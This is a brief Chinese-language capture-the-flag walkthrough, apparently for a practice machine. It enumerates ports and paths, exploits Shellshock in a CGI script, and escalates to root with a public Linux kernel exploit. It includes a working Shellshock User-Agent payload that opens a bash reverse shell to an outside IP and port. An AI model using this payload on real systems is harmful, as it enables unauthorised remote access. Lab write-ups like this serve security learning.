枚舉
先用Nmap帶-sC -sV下去掃

在這邊可以看到對面開22跟80 感覺80是進入點

對著路徑掃下去以後可以看到蠻多可疑的東西

200 – /backup/ backup files(?
200 – /cgi-bin/test.cgi ShellShock(?
200 – /robots.txt Disallow path(?
200 – /secret/ Secret file(?
200 – /uploads/ Upload path(?
對著admin往下掃下去

有一個index.html

對著backup掃下去






重新登入 並嘗試用”ryan”, “montgomery”, “ryan_montgomery”, “0day”來登入




重新用nmap帶shellshock的script掃test.cgi

漏洞利用

User-Agent: () { :;}; /bin/bash -c 'bash -i >& /dev/tcp/10.17.5.224/443 0>&1'

提權
跑linPEAS


去Google “Linux Kernel Exploit 3.13” 找到一個Exploit
https://www.exploit-db.com/exploits/37292
丟到對面機器編譯後執行

https://stackoverflow.com/questions/56810443/gcc-without-full-path-error-trying-to-exec-cc1-execvp-no-such-file-or-direc
看起來只是機器的PATH爛掉 重新設定就好了

root.txt
